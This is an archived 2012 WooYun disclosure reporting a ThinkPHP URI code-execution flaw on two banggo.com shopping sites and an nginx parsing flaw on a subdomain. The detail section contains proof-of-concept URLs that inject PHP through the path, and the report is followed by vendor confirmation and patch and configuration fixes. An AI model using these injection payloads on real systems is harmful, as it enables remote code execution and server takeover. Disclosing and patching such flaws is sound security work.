漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-013993
漏洞标题:美特斯邦威两个商城代码执行导致直接沦陷+某子站nginx解析漏洞
相关厂商:banggo.com
漏洞作者: Seay
提交时间:2012-10-29 13:40
修复时间:2012-12-13 13:41
公开时间:2012-12-13 13:41
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-10-29: 细节已通知厂商并且等待厂商处理中
2012-10-29: 厂商已经确认,细节仅向厂商公开
2012-11-08: 细节向核心白帽子及相关领域专家公开
2012-11-18: 细节向普通白帽子公开
2012-11-28: 细节向实习白帽子公开
2012-12-13: 细节向公众公开
简要描述:
美特斯邦威两个商城PHP代码执行导致直接沦陷;
某子站nginx解析漏洞
详细说明:
两个商城ThinkPHP框架URI任意代码执行漏洞
http://ampm.banggo.com/Goods/allcomment_616513.shtml/abc-abc-abc-$%7B@print(phpinfo())%7D/
http://tuan.banggo.com/pptuan/10-0-1-0.shtml/abc/abc/abc/$%7B@print(phpinfo())%7D
代码执行,直接就可以getshell了。
还有一个nginx解析漏洞:http://express.banggo.com/css/templatecss/global.css/seay.php
漏洞证明:
亲,直接上图了哦。
代码执行的两个站:
nginx解析漏洞
修复方案:
亲爱的美邦,一直很喜欢哇,求礼物,求鼓励。
thinkphp的代码执行,
可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
nginx解析漏洞修复:
引用自百度:
1 关闭php.ini里的path_info,cgi.path_info设置成0.如果默认前面有;或者就没这段,就手动加上cgi.path_info = 0,2 修改nginx里的设置。
比如原始文件
server {
listen 80;
server_name typengine.com;
location / {
root /home/www/typengine.com;
index index.php index.html index.htm;
autoindex on;
}
location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
fastcgi_param SCRIPT_FILENAME /home/www/typengine.com$fastcgi_script_name;
include fastcgi_params;
}
}
版权声明:转载请注明来源 Seay@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2012-10-29 14:29
厂商回复:
谢谢好友提醒
最新状态:
暂无
漏洞评价:
评论
-
@Seay 有礼物?
( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)